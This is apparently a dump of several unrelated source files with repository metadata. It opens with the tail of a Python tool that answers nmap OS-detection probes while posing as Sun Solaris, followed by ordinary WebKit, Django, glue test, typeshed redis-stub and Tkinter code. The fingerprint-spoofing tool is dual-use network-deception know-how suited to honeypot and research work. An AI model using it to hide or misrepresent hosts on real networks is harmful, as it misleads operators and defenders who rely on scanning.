    if arg == '-d': nmapOsDB = value
    where:
    arg = argv[i]
    value = argv[i+1]
"""
        exit()
    global Fingerprint, IFACE, MAC, IP, nmapOSDB
    # Crude flag parsing: every argv position is tried as a flag; ``value``
    # is the following token (None for the last one).
    for i in xrange(len(argv)):
        arg = argv[i]
        try: value = argv[i+1]
        except: value = None
        if arg == '-h': usage()
        if arg == '--help': usage()
        if arg == '-f': Fingerprint = value
        if arg == '-p': IP = value
        if arg == '-m': MAC = value
        if arg == '-i': IFACE = value
        if arg == '-d': nmapOSDB = value
    print "Emulating: %r" % Fingerprint
    print "at %s / %s / %s" % (IFACE, MAC, IP)
    machine = Machine(
        Fingerprint,
        IFACE,
        IP,
        MAC,
        OPEN_TCP_PORTS,
        OPEN_UDP_PORTS,
        nmapOSDB = nmapOSDB)
    initResponders(machine)
    machine.initGenericResponders()
    machine.run()
if __name__ == '__main__':
    main()
# All Probes
# [x] SEQ
# [x] OPS
# [x] WIN
# [x] T1
# [x] T2
# [x] T3
# [x] T4
# [x] T5
# [x] T6
# [x] T7
# [x] IE
# [x] ECN
# [x] U1
# All Tests
# SEQ()
# [x] TCP ISN sequence predictability index (SP)
# [x] TCP ISN greatest common divisor (GCD)
# [x] TCP ISN counter rate (ISR)
# [x] IP ID sequence generation algorithm on TCP Open ports (TI)
# [x] Z - All zeros
# [x] RD - Random: It increments at least once by at least 20000.
# [-] Hex Value - fixed IP ID
# [x] RI - Random positive increments. Any (delta_i > 1000, and delta_i % 256 != 0) or (delta_i > 256000 and delta_i % 256 == 0)
# [x] BI - Broken increment. All delta_i % 256 = 0 and all delta_i <= 5120.
# [x] I - Incremental. All delta_i < 10
# [x]   O - (Omitted: the test does not show in the fingerprint). None of the other cases apply
# [-] IP ID sequence generation algorithm on TCP closed ports (CI)
# [x] IP ID sequence generation algorithm on ICMP messages (II)
# [x] Shared IP ID sequence Boolean (SS)
# [x] TCP timestamp option algorithm (TS)
# [x] U - unsupported (don't send TS)
# [x] 0 - Zero
# [x] 1 - 0-5.66 (2 Hz)
# [x] 7 - 70-150 (100 Hz)
# [x] 8 - 150-350 (200 Hz)
# [x] - avg_freq = sum(TS_diff/time_diff) . round(.5 + math.log(avg_freq)/math.log(2)))
#                     time_diff = 0.11 secs
# OPS()
# [x] TCP options (O, O1-O6)
# WIN()
# [x] TCP initial window size (W, W1-W6)
# ECN, T1-T7
# [x] TCP options (O, O1-O6)
# [x] TCP initial window size (W, W1-W6)
# [x] Responsiveness (R)
# [x] IP don't fragment bit (DF)
# [x] IP initial time-to-live (T)
# [x] IP initial time-to-live guess (TG)
# [x] Explicit congestion notification (CC)
# [x] TCP miscellaneous quirks (Q)
# [x] TCP sequence number (S)
# [x] TCP acknowledgment number (A)
# [x] TCP flags (F)
# [x] TCP RST data checksum (RD)
# IE()
# [x] Responsiveness (R)
# [x] Don't fragment (ICMP) (DFI)
# [x] IP initial time-to-live (T)
# [x] IP initial time-to-live guess (TG)
# [x] ICMP response code (CD)
#-[x] IP Type of Service (TOSI)
#-[x] ICMP Sequence number (SI)
#-[x] IP Data Length (DLI)
# U1()
# [x] Responsiveness (R)
# [x] IP don't fragment bit (DF)
# [x] IP initial time-to-live (T)
# [x] IP initial time-to-live guess (TG)
# [x] IP total length (IPL)
# [x] Unused port unreachable field nonzero (UN)
# [x] Returned probe IP total length value (RIPL)
# [x] Returned probe IP ID value (RID)
# [x] Integrity of returned probe IP checksum value (RIPCK)
# [x] Integrity of returned probe UDP checksum (RUCK)
# [x] Integrity of returned UDP data (RUD)
# [-] ??? (TOS) Type of Service
# [-] ??? (RUL) Length of return UDP packet is correct
# sudo nmap -O 127.0.0.2 -p 22,111,89
# sudo python nmapAnswerMachine.py -i eth0 -p 192.168.66.254 -f 'Sun Solaris 9 (SPARC)'
| [
"la236am@users.isi.deterlab.net"
] | la236am@users.isi.deterlab.net |
7e05461799b0f76803a45bd5d539ec259176b050 | 2a28bb9594fe98a6e8934b6e5eb952baa3a0b803 | /Tools/Scripts/libraries/webkitscmpy/webkitscmpy/__init__.py | 9f3ebe6570c7c695504043d655d51c588165c7f4 | [] | no_license | yolin1020/WebKit | 154b0f177b0d48be66e78717e85d98e546dcf9c5 | b7e84a4224b3934868bc08f5c89b583355a6c87a | refs/heads/main | 2023-02-02T22:48:08.044648 | 2020-12-18T19:34:39 | 2020-12-18T19:34:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,698 | py | # Copyright (C) 2020 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import os
import sys
log = logging.getLogger('webkitscmpy')
def _maybe_add_webkitcorepy_path():
# Hopefully we're beside webkitcorepy, otherwise webkitcorepy will need to be installed.
libraries_path = os.path.dirname(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
webkitcorepy_path = os.path.join(libraries_path, 'webkitcorepy')
if os.path.isdir(webkitcorepy_path) and os.path.isdir(os.path.join(webkitcorepy_path, 'webkitcorepy')) and webkitcorepy_path not in sys.path:
sys.path.insert(0, webkitcorepy_path)
# Module bootstrap: locate webkitcorepy, declare our version and register the
# third-party packages AutoInstall may fetch on demand.
_maybe_add_webkitcorepy_path()
try:
    from webkitcorepy import AutoInstall, Package, Version
except ImportError:
    raise ImportError(
        "'webkitcorepy' could not be found on your Python path.\n" +
        "You are not running from a WebKit checkout.\n" +
        "Please install webkitcorepy with `pip install webkitcorepy --extra-index-url <package index URL>`"
    )
# Version of the webkitscmpy package itself.
version = Version(0, 6, 4)
# Dependencies auto-installed on first import.
AutoInstall.register(Package('fasteners', Version(0, 15, 0)))
AutoInstall.register(Package('monotonic', Version(1, 5)))
AutoInstall.register(Package('xmltodict', Version(0, 12, 0)))
from webkitscmpy.contributor import Contributor
from webkitscmpy.commit import Commit
from webkitscmpy.scm_base import ScmBase
from webkitscmpy import local
from webkitscmpy import mocks
name = 'webkitscmpy'
| [
"jbedard@apple.com"
] | jbedard@apple.com |
4d32b5dceb9de6e224b0bfe285ac1b75465b2816 | 45954869eb53b1f6fe4b675494b72a76fcac534c | /instagram/admin.py | d5b6d964da407dab1a778d7eba0041e2bb736d71 | [
"MIT"
] | permissive | Jmos-Mbugua/Insta-clone | b69f39a9d3e7ad8b21bcf77a4695a17a4dc75b74 | 85ab0f3ee93c2ed5b9778058e3df31e25563e5e8 | refs/heads/master | 2022-12-14T22:16:14.829459 | 2020-02-14T12:59:16 | 2020-02-14T12:59:16 | 239,035,462 | 0 | 0 | null | 2022-12-08T03:36:40 | 2020-02-07T22:42:39 | Python | UTF-8 | Python | false | false | 228 | py | from django.contrib import admin
# Expose the Instagram-clone models in the Django admin interface.
from .models import Location, Post,Comment, Profile
# Register your models here.
admin.site.register(Location)
admin.site.register(Post)
admin.site.register(Comment)
admin.site.register(Profile)
"johnmbugua849@gmail.com"
] | johnmbugua849@gmail.com |
b5f75d478ae8417a7b455f03ba8803cfefa44c07 | 9ecefebb7f8e1445a5e93479f3e00b9181b6536c | /glue/viewers/histogram/qt/tests/test_data_viewer.py | 3511565a2f986e73b432a33cd48befa97df70bcb | [
"BSD-3-Clause"
] | permissive | akshayakhare/glue | 938f4c4a7c16cfceed9b60bcca0af94b705c97aa | 1471126c876e787270ec6fd33d997ad68ff32fea | refs/heads/master | 2021-08-14T20:20:31.929041 | 2017-11-16T16:22:10 | 2017-11-16T18:05:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,573 | py | # pylint: disable=I0011,W0613,W0201,W0212,E1101,E1103
from __future__ import absolute_import, division, print_function
import os
from collections import Counter
import pytest
from numpy.testing import assert_equal, assert_allclose
from glue.core.message import SubsetUpdateMessage
from glue.core import HubListener, Data
from glue.core.roi import XRangeROI
from glue.core.subset import RangeSubsetState, CategoricalROISubsetState
from glue import core
from glue.core.component_id import ComponentID
from glue.core.tests.util import simple_session
from glue.utils.qt import combo_as_string
from glue.viewers.matplotlib.qt.tests.test_data_viewer import BaseTestMatplotlibDataViewer
from glue.core.state import GlueUnSerializer
from glue.app.qt.layer_tree_widget import LayerTreeWidget
from ..data_viewer import HistogramViewer
# Directory holding saved-session fixtures used by the back-compat tests.
DATA = os.path.join(os.path.dirname(__file__), 'data')
class TestHistogramCommon(BaseTestMatplotlibDataViewer):
    # Runs the shared matplotlib data-viewer test suite against the histogram
    # viewer, using a small mixed numeric/categorical dataset.
    def init_data(self):
        return Data(label='d1', x=[3.4, 2.3, -1.1, 0.3], y=['a', 'b', 'c', 'a'])
    viewer_cls = HistogramViewer
class TestHistogramViewer(object):
def setup_method(self, method):
self.data = Data(label='d1', x=[3.4, 2.3, -1.1, 0.3], y=['a', 'b', 'c', 'a'])
self.session = simple_session()
self.hub = self.session.hub
self.data_collection = self.session.data_collection
self.data_collection.append(self.data)
self.viewer = HistogramViewer(self.session)
self.data_collection.register_to_hub(self.hub)
self.viewer.register_to_hub(self.hub)
def teardown_method(self, method):
self.viewer.close()
def test_basic(self):
viewer_state = self.viewer.state
# Check defaults when we add data
self.viewer.add_data(self.data)
assert combo_as_string(self.viewer.options_widget().ui.combosel_x_att) == 'Main components:x:y:Coordinate components:Pixel Axis 0 [x]:World 0'
assert viewer_state.x_att is self.data.id['x']
assert viewer_state.x_min == -1.1
assert viewer_state.x_max == 3.4
assert viewer_state.y_min == 0.0
assert viewer_state.y_max == 1.2
assert viewer_state.hist_x_min == -1.1
assert viewer_state.hist_x_max == 3.4
assert viewer_state.hist_n_bin == 15
assert not viewer_state.cumulative
assert not viewer_state.normalize
assert not viewer_state.x_log
assert not viewer_state.y_log
assert len(viewer_state.layers) == 1
# Change to categorical component and check new values
viewer_state.x_att = self.data.id['y']
assert viewer_state.x_min == -0.5
assert viewer_state.x_max == 2.5
assert viewer_state.y_min == 0.0
assert viewer_state.y_max == 2.4
assert viewer_state.hist_x_min == -0.5
assert viewer_state.hist_x_max == 2.5
assert viewer_state.hist_n_bin == 3
assert not viewer_state.cumulative
assert not viewer_state.normalize
assert not viewer_state.x_log
assert not viewer_state.y_log
def test_flip(self):
viewer_state = self.viewer.state
self.viewer.add_data(self.data)
assert viewer_state.x_min == -1.1
assert viewer_state.x_max == 3.4
self.viewer.options_widget().button_flip_x.click()
assert viewer_state.x_min == 3.4
assert viewer_state.x_max == -1.1
def test_remove_data(self):
self.viewer.add_data(self.data)
assert combo_as_string(self.viewer.options_widget().ui.combosel_x_att) == 'Main components:x:y:Coordinate components:Pixel Axis 0 [x]:World 0'
self.data_collection.remove(self.data)
assert combo_as_string(self.viewer.options_widget().ui.combosel_x_att) == ''
def test_update_component_updates_title(self):
self.viewer.add_data(self.data)
assert self.viewer.windowTitle() == '1D Histogram'
self.viewer.state.x_att = self.data.id['y']
assert self.viewer.windowTitle() == '1D Histogram'
def test_combo_updates_with_component_add(self):
self.viewer.add_data(self.data)
self.data.add_component([3, 4, 1, 2], 'z')
assert self.viewer.state.x_att is self.data.id['x']
assert combo_as_string(self.viewer.options_widget().ui.combosel_x_att) == 'Main components:x:y:z:Coordinate components:Pixel Axis 0 [x]:World 0'
def test_nonnumeric_first_component(self):
# regression test for #208. Shouldn't complain if
# first component is non-numerical
data = core.Data()
data.add_component(['a', 'b', 'c'], label='c1')
data.add_component([1, 2, 3], label='c2')
self.data_collection.append(data)
self.viewer.add_data(data)
def test_histogram_values(self):
# Check the actual values of the histograms
viewer_state = self.viewer.state
self.viewer.add_data(self.data)
# Numerical attribute
viewer_state.hist_x_min = -5
viewer_state.hist_x_max = 5
viewer_state.hist_n_bin = 4
assert_allclose(self.viewer.state.y_max, 2.4)
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 1, 2, 1])
assert_allclose(self.viewer.layers[0].mpl_bins, [-5, -2.5, 0, 2.5, 5])
cid = self.data.visible_components[0]
self.data_collection.new_subset_group('subset 1', cid < 2)
assert_allclose(self.viewer.layers[1].mpl_hist, [0, 1, 1, 0])
assert_allclose(self.viewer.layers[1].mpl_bins, [-5, -2.5, 0, 2.5, 5])
viewer_state.normalize = True
assert_allclose(self.viewer.state.y_max, 0.24)
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 0.1, 0.2, 0.1])
assert_allclose(self.viewer.layers[0].mpl_bins, [-5, -2.5, 0, 2.5, 5])
assert_allclose(self.viewer.layers[1].mpl_hist, [0, 0.2, 0.2, 0])
assert_allclose(self.viewer.layers[1].mpl_bins, [-5, -2.5, 0, 2.5, 5])
viewer_state.cumulative = True
assert_allclose(self.viewer.state.y_max, 1.2)
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 0.25, 0.75, 1.0])
assert_allclose(self.viewer.layers[0].mpl_bins, [-5, -2.5, 0, 2.5, 5])
assert_allclose(self.viewer.layers[1].mpl_hist, [0, 0.5, 1.0, 1.0])
assert_allclose(self.viewer.layers[1].mpl_bins, [-5, -2.5, 0, 2.5, 5])
viewer_state.normalize = False
assert_allclose(self.viewer.state.y_max, 4.8)
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 1, 3, 4])
assert_allclose(self.viewer.layers[0].mpl_bins, [-5, -2.5, 0, 2.5, 5])
assert_allclose(self.viewer.layers[1].mpl_hist, [0, 1, 2, 2])
assert_allclose(self.viewer.layers[1].mpl_bins, [-5, -2.5, 0, 2.5, 5])
viewer_state.cumulative = False
# Categorical attribute
viewer_state.x_att = self.data.id['y']
formatter = self.viewer.axes.xaxis.get_major_formatter()
xlabels = [formatter.format_data(pos) for pos in range(3)]
assert xlabels == ['a', 'b', 'c']
assert_allclose(self.viewer.state.y_max, 2.4)
assert_allclose(self.viewer.layers[0].mpl_hist, [2, 1, 1])
assert_allclose(self.viewer.layers[0].mpl_bins, [-0.5, 0.5, 1.5, 2.5])
assert_allclose(self.viewer.layers[1].mpl_hist, [1, 0, 1])
assert_allclose(self.viewer.layers[1].mpl_bins, [-0.5, 0.5, 1.5, 2.5])
viewer_state.normalize = True
assert_allclose(self.viewer.state.y_max, 0.6)
assert_allclose(self.viewer.layers[0].mpl_hist, [0.5, 0.25, 0.25])
assert_allclose(self.viewer.layers[0].mpl_bins, [-0.5, 0.5, 1.5, 2.5])
assert_allclose(self.viewer.layers[1].mpl_hist, [0.5, 0, 0.5])
assert_allclose(self.viewer.layers[1].mpl_bins, [-0.5, 0.5, 1.5, 2.5])
viewer_state.cumulative = True
assert_allclose(self.viewer.state.y_max, 1.2)
assert_allclose(self.viewer.layers[0].mpl_hist, [0.5, 0.75, 1])
assert_allclose(self.viewer.layers[0].mpl_bins, [-0.5, 0.5, 1.5, 2.5])
assert_allclose(self.viewer.layers[1].mpl_hist, [0.5, 0.5, 1])
assert_allclose(self.viewer.layers[1].mpl_bins, [-0.5, 0.5, 1.5, 2.5])
viewer_state.normalize = False
assert_allclose(self.viewer.state.y_max, 4.8)
assert_allclose(self.viewer.layers[0].mpl_hist, [2, 3, 4])
assert_allclose(self.viewer.layers[0].mpl_bins, [-0.5, 0.5, 1.5, 2.5])
assert_allclose(self.viewer.layers[1].mpl_hist, [1, 1, 2])
assert_allclose(self.viewer.layers[1].mpl_bins, [-0.5, 0.5, 1.5, 2.5])
# TODO: add tests for log
def test_apply_roi(self):
# Check that when doing an ROI selection, the ROI clips to the bin edges
# outside the selection
viewer_state = self.viewer.state
self.viewer.add_data(self.data)
viewer_state.hist_x_min = -5
viewer_state.hist_x_max = 5
viewer_state.hist_n_bin = 4
roi = XRangeROI(-0.2, 0.1)
assert len(self.viewer.layers) == 1
self.viewer.apply_roi(roi)
assert len(self.viewer.layers) == 2
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 1, 2, 1])
assert_allclose(self.viewer.layers[1].mpl_hist, [0, 1, 2, 0])
assert_allclose(self.data.subsets[0].to_mask(), [0, 1, 1, 1])
state = self.data.subsets[0].subset_state
assert isinstance(state, RangeSubsetState)
assert state.lo == -2.5
assert state.hi == 2.5
# TODO: add a similar test in log space
def test_apply_roi_categorical(self):
# Check that when doing an ROI selection, the ROI clips to the bin edges
# outside the selection
viewer_state = self.viewer.state
self.viewer.add_data(self.data)
viewer_state.x_att = self.data.id['y']
roi = XRangeROI(0.3, 0.9)
assert len(self.viewer.layers) == 1
self.viewer.apply_roi(roi)
assert len(self.viewer.layers) == 2
assert_allclose(self.viewer.layers[0].mpl_hist, [2, 1, 1])
assert_allclose(self.viewer.layers[1].mpl_hist, [2, 1, 0])
assert_allclose(self.data.subsets[0].to_mask(), [1, 1, 0, 1])
state = self.data.subsets[0].subset_state
assert isinstance(state, CategoricalROISubsetState)
assert_equal(state.roi.categories, ['a', 'b'])
def test_apply_roi_empty(self):
# Make sure that doing an ROI selection on an empty viewer doesn't
# produce error messsages
roi = XRangeROI(-0.2, 0.1)
self.viewer.apply_roi(roi)
def test_axes_labels(self):
viewer_state = self.viewer.state
self.viewer.add_data(self.data)
assert self.viewer.axes.get_xlabel() == 'x'
assert self.viewer.axes.get_ylabel() == 'Number'
viewer_state.x_log = True
assert self.viewer.axes.get_xlabel() == 'Log x'
assert self.viewer.axes.get_ylabel() == 'Number'
viewer_state.x_att = self.data.id['y']
assert self.viewer.axes.get_xlabel() == 'y'
assert self.viewer.axes.get_ylabel() == 'Number'
viewer_state.normalize = True
assert self.viewer.axes.get_xlabel() == 'y'
assert self.viewer.axes.get_ylabel() == 'Normalized number'
viewer_state.normalize = False
viewer_state.cumulative = True
assert self.viewer.axes.get_xlabel() == 'y'
assert self.viewer.axes.get_ylabel() == 'Number'
def test_y_min_y_max(self):
# Regression test for a bug that caused y_max to not be set correctly
# when multiple subsets were present and after turning on normalization
# after switching to a different attribute from that used to make the
# selection.
viewer_state = self.viewer.state
self.viewer.add_data(self.data)
self.data.add_component([3.4, 3.5, 10.2, 20.3], 'z')
viewer_state.x_att = self.data.id['x']
cid = self.data.visible_components[0]
self.data_collection.new_subset_group('subset 1', cid < 1)
cid = self.data.visible_components[0]
self.data_collection.new_subset_group('subset 2', cid < 2)
cid = self.data.visible_components[0]
self.data_collection.new_subset_group('subset 3', cid < 3)
assert_allclose(self.viewer.state.y_min, 0)
assert_allclose(self.viewer.state.y_max, 1.2)
viewer_state.x_att = self.data.id['z']
assert_allclose(self.viewer.state.y_min, 0)
assert_allclose(self.viewer.state.y_max, 2.4)
viewer_state.normalize = True
assert_allclose(self.viewer.state.y_min, 0)
assert_allclose(self.viewer.state.y_max, 0.5325443786982249)
def test_update_when_limits_unchanged(self):
# Regression test for glue-viz/glue#1010 - this bug caused histograms
# to not be recomputed if the attribute changed but the limits and
# number of bins did not.
viewer_state = self.viewer.state
self.viewer.add_data(self.data)
viewer_state.x_att = self.data.id['y']
viewer_state.hist_x_min = -10
viewer_state.hist_x_max = +10
viewer_state.hist_n_bin = 5
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 0, 3, 1, 0])
viewer_state.x_att = self.data.id['x']
viewer_state.hist_x_min = -10
viewer_state.hist_x_max = +10
viewer_state.hist_n_bin = 5
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 0, 2, 2, 0])
viewer_state.x_att = self.data.id['y']
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 0, 3, 1, 0])
viewer_state.x_att = self.data.id['x']
assert_allclose(self.viewer.layers[0].mpl_hist, [0, 0, 2, 2, 0])
def test_component_replaced(self):
# regression test for 508 - if a component ID is replaced, we should
# make sure that the component ID is selected if the old component ID
# was selected
self.viewer.add_data(self.data)
self.viewer.state.x_att = self.data.components[0]
test = ComponentID('test')
self.data.update_id(self.viewer.state.x_att, test)
assert self.viewer.state.x_att is test
assert combo_as_string(self.viewer.options_widget().ui.combosel_x_att) == 'Main components:test:y:Coordinate components:Pixel Axis 0 [x]:World 0'
def test_nbin_override_persists_over_numerical_attribute_change(self):
# regression test for #398
self.data.add_component([3, 4, 1, 2], 'z')
self.viewer.add_data(self.data)
self.viewer.state.x_att = self.data.id['x']
self.viewer.state.hist_n_bin = 7
self.viewer.state.x_att = self.data.id['z']
assert self.viewer.state.hist_n_bin == 7
@pytest.mark.parametrize('protocol', [0, 1])
def test_session_back_compat(self, protocol):
filename = os.path.join(DATA, 'histogram_v{0}.glu'.format(protocol))
with open(filename, 'r') as f:
session = f.read()
state = GlueUnSerializer.loads(session)
ga = state.object('__main__')
dc = ga.session.data_collection
assert len(dc) == 1
assert dc[0].label == 'data'
viewer1 = ga.viewers[0][0]
assert len(viewer1.state.layers) == 2
assert viewer1.state.x_att is dc[0].id['a']
assert_allclose(viewer1.state.x_min, 0)
assert_allclose(viewer1.state.x_max, 9)
assert_allclose(viewer1.state.y_min, 0)
assert_allclose(viewer1.state.y_max, 2.4)
assert_allclose(viewer1.state.hist_x_min, 0)
assert_allclose(viewer1.state.hist_x_max, 9)
assert_allclose(viewer1.state.hist_n_bin, 6)
assert not viewer1.state.x_log
assert not viewer1.state.y_log
assert viewer1.state.layers[0].visible
assert not viewer1.state.layers[1].visible
assert not viewer1.state.cumulative
assert not viewer1.state.normalize
viewer2 = ga.viewers[0][1]
assert viewer2.state.x_att is dc[0].id['b']
assert_allclose(viewer2.state.x_min, 2)
assert_allclose(viewer2.state.x_max, 16)
assert_allclose(viewer2.state.y_min, 0)
assert_allclose(viewer2.state.y_max, 1.2)
assert_allclose(viewer2.state.hist_x_min, 2)
assert_allclose(viewer2.state.hist_x_max, 16)
assert_allclose(viewer2.state.hist_n_bin, 8)
assert not viewer2.state.x_log
assert not viewer2.state.y_log
assert viewer2.state.layers[0].visible
assert viewer2.state.layers[1].visible
assert not viewer2.state.cumulative
assert not viewer2.state.normalize
viewer3 = ga.viewers[0][2]
assert viewer3.state.x_att is dc[0].id['a']
assert_allclose(viewer3.state.x_min, 0)
assert_allclose(viewer3.state.x_max, 9)
assert_allclose(viewer3.state.y_min, 0.01111111111111111)
assert_allclose(viewer3.state.y_max, 0.7407407407407407)
assert_allclose(viewer3.state.hist_x_min, 0)
assert_allclose(viewer3.state.hist_x_max, 9)
assert_allclose(viewer3.state.hist_n_bin, 10)
assert not viewer3.state.x_log
assert viewer3.state.y_log
assert viewer3.state.layers[0].visible
assert viewer3.state.layers[1].visible
assert not viewer3.state.cumulative
assert viewer3.state.normalize
viewer4 = ga.viewers[0][3]
assert viewer4.state.x_att is dc[0].id['a']
assert_allclose(viewer4.state.x_min, -1)
assert_allclose(viewer4.state.x_max, 10)
assert_allclose(viewer4.state.y_min, 0)
assert_allclose(viewer4.state.y_max, 12)
assert_allclose(viewer4.state.hist_x_min, -1)
assert_allclose(viewer4.state.hist_x_max, 10)
assert_allclose(viewer4.state.hist_n_bin, 4)
assert not viewer4.state.x_log
assert not viewer4.state.y_log
assert viewer4.state.layers[0].visible
assert viewer4.state.layers[1].visible
assert viewer4.state.cumulative
assert not viewer4.state.normalize
def test_apply_roi_single(self):
    # Regression test for a bug that caused mode.update to be called
    # multiple times and resulted in all other viewers receiving many
    # messages regarding subset updates (this occurred when multiple
    # datasets were present).

    # Wire a layer tree to the edit subset, mirroring how the real
    # application drives subset selection.
    layer_tree = LayerTreeWidget()
    layer_tree.set_checkable(False)
    layer_tree.setup(self.data_collection)
    layer_tree.bind_selection_to_edit_subset()

    class Client(HubListener):
        # Minimal hub listener that counts how many SubsetUpdateMessage
        # deliveries each sender produced.

        def __init__(self, *args, **kwargs):
            super(Client, self).__init__(*args, **kwargs)
            self.count = Counter()

        def ping(self, message):
            self.count[message.sender] += 1

        def register_to_hub(self, hub):
            hub.subscribe(self, SubsetUpdateMessage, handler=self.ping)

    d1 = Data(a=[1, 2, 3], label='d1')
    d2 = Data(b=[1, 2, 3], label='d2')
    d3 = Data(c=[1, 2, 3], label='d3')
    d4 = Data(d=[1, 2, 3], label='d4')

    self.data_collection.append(d1)
    self.data_collection.append(d2)
    self.data_collection.append(d3)
    self.data_collection.append(d4)

    client = Client()
    client.register_to_hub(self.hub)

    # Only two of the four datasets are added to the viewer.
    self.viewer.add_data(d1)
    self.viewer.add_data(d3)

    roi = XRangeROI(2.5, 3.5)
    self.viewer.apply_roi(roi)

    # Each subset must receive exactly one update; more than one would
    # mean mode.update fired repeatedly (the regression being tested).
    for subset in client.count:
        assert client.count[subset] == 1
| [
"thomas.robitaille@gmail.com"
] | thomas.robitaille@gmail.com |
a764645348053f284abb738a5febafeabb9cc262 | 14373275670c1f3065ce9ae195df142146e2c1a4 | /stubs/redis/redis/commands/search/query.pyi | eb1846bab957d9c44c9913f2791264cc54783e40 | [
"Apache-2.0",
"MIT"
] | permissive | sobolevn/typeshed | eb7af17c06a9722f23c337e6b9a4726223155d58 | d63a82640390a9c130e0fe7d409e8b0b836b7c31 | refs/heads/master | 2023-08-04T05:59:29.447015 | 2023-06-14T21:27:53 | 2023-06-14T21:27:53 | 216,265,622 | 2 | 0 | Apache-2.0 | 2022-02-08T10:40:53 | 2019-10-19T20:21:25 | Python | UTF-8 | Python | false | false | 1,654 | pyi | from _typeshed import Incomplete
from typing import Any
class Query:
    """Builder for a RediSearch ``FT.SEARCH`` query.

    Setter methods accumulate options on the query object (the stubbed
    implementations presumably return ``self`` for chaining — confirm
    against redis-py); ``get_args`` serializes them into command
    arguments.
    """
    def __init__(self, query_string) -> None: ...
    def query_string(self): ...
    # Restrict results to an explicit set of document ids.
    def limit_ids(self, *ids): ...
    # Control which document fields are returned with each result.
    def return_fields(self, *fields): ...
    def return_field(self, field, as_field: Incomplete | None = None): ...
    # Summarization / highlighting of matched fragments.
    def summarize(
        self,
        fields: Incomplete | None = None,
        context_len: Incomplete | None = None,
        num_frags: Incomplete | None = None,
        sep: Incomplete | None = None,
    ): ...
    def highlight(self, fields: Incomplete | None = None, tags: Incomplete | None = None): ...
    # Query-matching behavior (stemming language, term slop, ordering,
    # custom scorer).
    def language(self, language): ...
    def slop(self, slop): ...
    def in_order(self): ...
    def scorer(self, scorer): ...
    def get_args(self): ...
    # Result-set shaping: pagination and verbatim/content flags.
    def paging(self, offset, num): ...
    def verbatim(self): ...
    def no_content(self): ...
    def no_stopwords(self): ...
    def with_payloads(self): ...
    def with_scores(self): ...
    def limit_fields(self, *fields): ...
    # Attach a Filter instance (numeric or geo) and sorting.
    def add_filter(self, flt): ...
    def sort_by(self, field, asc: bool = True): ...
    def expander(self, expander): ...
class Filter:
    """Base class for search filters; holds the raw argument sequence
    appended to the search command."""
    # Serialized filter arguments (presumably keyword followed by field
    # and bounds — confirm against redis-py).
    args: Any
    def __init__(self, keyword, field, *args) -> None: ...
class NumericFilter(Filter):
    """Filter matching documents whose numeric *field* lies between
    *minval* and *maxval*; either bound may be made exclusive."""
    # Sentinel strings for unbounded ranges.
    INF: str
    NEG_INF: str
    def __init__(self, field, minval, maxval, minExclusive: bool = False, maxExclusive: bool = False) -> None: ...
class GeoFilter(Filter):
    """Filter matching documents whose geo *field* lies within *radius*
    of the point (*lon*, *lat*), measured in *unit*."""
    # Accepted distance units for the *unit* parameter.
    METERS: str
    KILOMETERS: str
    FEET: str
    MILES: str
    def __init__(self, field, lon, lat, radius, unit="km") -> None: ...
class SortbyField:
    """SORTBY clause: order results on *field*, ascending by default."""
    # Serialized sort arguments (field name plus direction flag).
    args: Any
    def __init__(self, field, asc: bool = True) -> None: ...
| [
"noreply@github.com"
] | sobolevn.noreply@github.com |
db14263818ca2ec53409ec3e900b8bb1024d43c3 | 86a26119af259e3858cb5e57ea2e41e3b25c5fa7 | /Python Project/StockerLogin_support.py | e025cae333394920cf0640976bbfb93881497cb4 | [] | no_license | deshmukhshweta/project2 | 747ca7972a7bfdc4aed20dbb4ee3f6d2f009ca83 | 8bf07454d259456dc616e7283c266b35fe7b870d | refs/heads/master | 2020-04-19T09:57:05.541157 | 2019-01-29T09:27:01 | 2019-01-29T09:27:01 | 168,125,342 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,612 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Support module generated by PAGE version 4.13
# In conjunction with Tcl version 8.6
# May 27, 2018 02:27:42 PM
import sys
from tkinter import messagebox
from firebase import firebase as fb
try:
from Tkinter import *
except ImportError:
from tkinter import *
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
def init(top, gui, *args, **kwargs):
    """Remember the toplevel window and generated GUI object.

    PAGE calls this after building the window; the references are kept
    in module globals (``w``, ``top_level``, ``root``) so the callback
    functions in this module can reach the widgets later. Extra
    positional/keyword arguments are accepted and ignored.
    """
    global w, top_level, root
    w = gui
    root = top_level = top
def destroy_window():
    """Destroy the login window and clear the module-level reference."""
    global top_level
    window = top_level
    window.destroy()
